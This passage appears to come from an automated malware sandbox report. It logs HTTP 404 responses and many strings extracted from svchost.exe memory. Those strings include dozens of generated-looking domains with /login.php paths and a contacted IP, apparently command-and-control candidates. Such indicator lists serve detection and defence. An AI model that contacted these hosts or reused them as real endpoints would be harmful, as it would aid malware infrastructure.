User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: 106.15.232.163:8000
Connection: Keep-Alive
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Date: Mon, 11 Nov 2024 17:24:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
vary: Accept-Encoding
expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PyFL6VAvOnFvD1bpa9f8VdEyic%2BvDdTMGmG%2Ff6yfp2eUzAVR2fvsMKqGVEdJgJquHamRCnzfIMmKVtvLzXyhjUhto1zmOlB4yrE%2BB1YX5QpnxtM80JLE%2Fb8rS4C2GA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e0ff9ee4a2e183d-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1231&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=881&delivery_rate=2149962&cwnd=250&unsent_bytes=0&cid=29c9b339551dce15&ts=1161&x=0"
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Date: Mon, 11 Nov 2024 17:24:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
vary: Accept-Encoding
expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ijf5A6dkhwJpd1g%2FqnVvyygdBKHgUgzjFFRiB9HeFb6jOqtSidGKZX1YIGosrAOb1%2FR2wsJPQ7QqrJ7fTGvX3nTtw8%2BYk8aHoDb5jm5L07pH3uVcVDlxLEJliTDIeg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e0ff9fa69a9a2db-YUL
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=11393&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=881&delivery_rate=254124&cwnd=32&unsent_bytes=0&cid=7fcd1c432caa2cca&ts=788&x=0"
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Date: Mon, 11 Nov 2024 17:25:14 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
vary: Accept-Encoding
expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
server-timing: amp_sanitizer;dur="82.7",amp_style_sanitizer;dur="29.9",amp_tag_and_attribute_sanitizer;dur="39.8",amp_optimizer;dur="38.4"
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FnVbsvyJbXv35%2Fq2Vgc0nWpbkPaESsc7YhFuHeJTJK7z%2B8ulvwqV50phI%2BFyfyvkKL%2F%2BDJUV9cEEM3jYk%2BqCJIwq9xAm%2FxoECMpWOV6SDs2%2FHVfTCSsgD2V%2BPXW%2Fkw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e0ffaea3a396a50-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1708&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=881&delivery_rate=1641723&cwnd=251&unsent_bytes=0&cid=e91537255902d88c&ts=3073&x=0"
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Date: Mon, 11 Nov 2024 17:25:16 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
vary: Accept-Encoding
expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
server-timing: amp_sanitizer;dur="29.9",amp_style_sanitizer;dur="11.5",amp_tag_and_attribute_sanitizer;dur="14.2",amp_optimizer;dur="20.5"
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GekztQz1A10OtUkahkdaGerJujXD1US1a88cVxhgD7dcdOoNjvD8%2FpY%2By%2FH6sfcDiDRn7zjM2sna4%2BQPnDaanJYj5dHHP7KWWr8v%2B7pBY60E%2FWMA4Jf85GYhZmKnrg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e0ffb02ee5c43fe-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1336&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=881&delivery_rate=2220858&cwnd=244&unsent_bytes=0&cid=d104671925f2b1d9&ts=1703&x=0"
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Date: Mon, 11 Nov 2024 17:25:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
vary: Accept-Encoding
expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0tWGvUWrHSqfbbgsWEl%2BGkY0QEjgyi7VA5B4jGXL3Ppw4ZV7Fivf0bRuvu4UtiRYRYIppUy79ePPjSaQEzGJ%2F0vj%2Bp0bNuTkEWjZQnBfmIAH74XFr2pnXk1MV6zwhQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e0ffb65b9af5391-DEN
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=46905&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=881&delivery_rate=61831&cwnd=32&unsent_bytes=0&cid=8340e877fedd24c3&ts=709&x=0"
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Date: Mon, 11 Nov 2024 17:25:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
vary: Accept-Encoding
expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wk3mjjcLLNogo8n%2FO1NZ%2FzJH5m4jAys249E2LCauldADu%2FvW%2FcQTr%2BHNWp2PXJMY0JniZZsWuAK8mXNLH1Cv%2BK5gUiz5USEVlS5aBVev%2FgLNrC1PE4iDxizaupLXug%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e0ffb704e748c57-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1296&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=881&delivery_rate=2214067&cwnd=251&unsent_bytes=0&cid=5ce8563c57c430c1&ts=1019&x=0"
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 11 Nov 2024 17:24:24 GMT
Content-Length: 1245
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 11 Nov 2024 17:24:30 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 11 Nov 2024 17:24:31 GMT
Content-Type: text/html
Content-Length: 548
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: openresty/1.21.4.3
Date: Mon, 11 Nov 2024 17:25:12 GMT
Content-Type: text/html
Content-Length: 561
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 11 Nov 2024 17:25:18 GMT
Content-Type: text/html
Content-Length: 138
Connection: keep-alive
ETag: "663ee226-8a"
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 11 Nov 2024 17:25:24 GMT
Content-Length: 1245
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 11 Nov 2024 17:25:29 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic. HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx/1.14.0 (Ubuntu); Date: Mon, 11 Nov 2024 17:25:30 GMT; Content-Type: text/html; Content-Length: 580; Connection: keep-alive
Source: global traffic. HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx; Date: Mon, 11 Nov 2024 17:25:30 GMT; Content-Type: text/html; Content-Length: 548; Connection: keep-alive
Source: global traffic. HTTP traffic detected: HTTP/1.1 404 Not Found; Content-Type: text/html; Server: Microsoft-IIS/7.5; X-Powered-By: ASP.NET; Date: Mon, 11 Nov 2024 17:25:25 GMT; Content-Length: 1245
Source: global traffic. HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx; Date: Mon, 11 Nov 2024 17:25:30 GMT; Content-Type: text/html; Content-Length: 548; Connection: keep-alive
Source: svchost.exe, 00000002.00000003.1870864138.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1873643375.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1872098357.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1877431958.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1870410496.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1871321713.0000000002FE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganypeb.com/login.php
Source: svchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929708122.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1932220446.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyrew.com/login.php
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyriz.com/login.php
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyvyw.com/
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902913995.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyvyw.com/login.php
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyzas.com/
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878975656.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyzas.com/login.php
Source: svchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920326328.0000000008B58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929708122.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1932220446.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqydaz.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889837686.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889542311.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqykus.com/login.php
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1901770860.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqynih.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqypew.com/login.php
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqyqez.com/
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1897873188.0000000002F05000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqyqez.com/login.php
Source: svchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929613840.0000000002F32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1927868934.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929708122.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1932220446.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatycis.com/login.php
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1882273113.0000000002FE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatycyb.com/login.php
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1877431958.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyduh.com/login.php
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyhos.com/
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899969240.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902583004.0000000002F60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyhos.com/login.php
Source: svchost.exe, 00000002.00000003.1868655611.0000000002F05000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1845150942.0000000002FE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyhub.com/login.php
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyniz.com/
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916058806.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyniz.com/login.php
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyqeb.com/
Source: svchost.exe, 00000002.00000003.1838938821.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1838350942.0000000002F25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1837754876.0000000008ABD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1844445717.0000000002F25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1835708168.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1845203467.0000000002F32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyrez.com/login.php
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyruw.com/
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyruw.com/H
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899198248.0000000002F66000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyruw.com/login.php
Source: svchost.exe, 00000002.00000003.1920658467.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920519032.0000000002F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyveh.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyzoz.com/login.php
Source: svchost.exe, 00000002.00000003.1816439282.00000000008FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyzys.com/
Source: svchost.exe, 00000002.00000003.1362482553.0000000008A0D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1619980439.0000000008A15000.00000004.00000020.00020000.00000000.sdmp, login[1].htm0.2.drString found in binary or memory: http://i4.cdn-image.com/__media__/js/min.js?v2.3
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878975656.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygyfir.com/login.php
Source: svchost.exe, 00000002.00000003.1870864138.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1873643375.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1870410496.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1871321713.0000000002FE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygyged.com/login.php
Source: svchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920326328.0000000008B58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929708122.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1932220446.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygygux.com/login.php
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916356389.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygyjan.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1877431958.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygynox.com/login.php
Source: svchost.exe, 00000002.00000003.1816439282.00000000008FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygysij.com/
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1906808351.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygytix.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889542311.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygyvuj.com/login.php
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygyxad.com/
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykygaj.com/login.php
Source: svchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929613840.0000000002F32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1927868934.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929708122.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1932220446.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykygun.com/login.php
Source: svchost.exe, 00000002.00000003.1943881239.0000000002F05000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1940238200.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyjad.com/login.php
Source: svchost.exe, 00000002.00000003.1920658467.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920519032.0000000002F61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1922090654.0000000002F66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyjar.com/login.php
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1871321713.0000000002FE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyjux.com/
Source: svchost.exe, 00000002.00000003.1868655611.0000000002F05000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1863832827.0000000002FEA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1868461374.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1864780566.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1871321713.0000000002FE9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1868778341.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykylan.com/login.php
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykylud.com/
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916085702.0000000002FE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykylud.com/login.php
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyser.com/login.php
